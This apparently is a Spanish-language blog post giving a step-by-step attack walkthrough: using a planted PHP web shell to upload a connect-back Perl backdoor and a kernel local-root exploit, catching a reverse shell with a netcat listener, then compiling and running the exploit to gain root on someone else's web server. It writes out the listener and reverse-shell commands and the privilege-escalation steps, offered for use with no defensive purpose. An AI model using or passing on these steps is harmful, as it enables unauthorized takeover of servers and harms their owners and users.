Bueno Primero necesitamos tener lo siguiente:
* 1 phpshell (r57, c99, c40, etc).
* 1 Backshell ejemplo la datacha0s.
* Netcat
* Suficientes permisos para subiry ejecutar xD.
Ya suponiendo que tenemos la phpshell en x web donde queremos ser root del server, nos fijamos en la version del kernel, despues nos vemos a milw0rm o a google y buscamos el local root exploit para la version del kernel y ya obteniendo el local root exploit lo subimos junto con la backshell a la web a travez de la phpshell.
Ahora vamos a poner ala escucha el puerto donde queremos que se conecte el server a nuestra pc.
como?
Nos vamos a inicio/ejecutar/cmd y despues en la consola nos vamos a donde tenemos netcat,
ejemplo si lo pusimos en c: hacemos lo siguiente:
C:\Documents and Settings\Administrador>cd..
C:\Documents and Settings>cd..
C:\>
Luego tecleamos nc -lvvp puerto que queramos... ejemplo: nc -lvvp 21
C:\>nc -lvvp 21
listening on [any] 21 ...
Ok ya esta ala escucha el puerto 21.
Nos vamos ala phpshell y ejecutamos la backshell para que se conectarnos a nuestra pc:
perl nombredelabackshell.pl tuip puerto que pusimos ala escucha...ejemplo:
perl dc.pl 127.0.0.1 21
Y nos dira lo siguiente:
Data Cha0s Connect Back Backdoor
[*] Dumping Arguments
[*] Connecting...
[*] Spawning Shell
[*] Datached
Ahora vamos a netcat y vemos si en realidad conecto, en caso que aya conectado aparecera lo siguiente, ejemplo:
connect to [127.0.0.1] xweb.com [127.0.0.1] 57566
y en caso de que no conecte seguira apareciendo:
listening on [any] 21 ...
De lo contrario ya estaremos conectados al server desde nuestra pc.
Ahora compilaremos el local root exploit, en netcat tecleamos lo siguiente:
gcc nombre del local root exploit -o nombre del binario
ejemplo:
gcc bad.c -o bad
Despues le daremos permisos de lectura, escritura y ejecucion, de la siguiente manera:
chmod -c 777 bad
Luego ejecutamos el binario, asi:
./bad
ahora si todo salio bien y es vulnerable el kernel
al final de lo que nos diga la backshell ejecutada nos dira lo siguiente:
uid=0(root) gid=0(root) groups=48(apache)
y listo ya tenemos uid(0) de root =).
Nota: Espero sea entendible y luego subo imagenes.
Nota2: Checa con la phpshell que puertos tiene abiertos el server, para asi escojer alguno para conectar.
Nota3: si lo copias y lo pegas en otro lado no olvides su autor osease yo Zer0 z0orG xDD.
1 comentario:
Muy buena info :P me ha servido
Publicar un comentario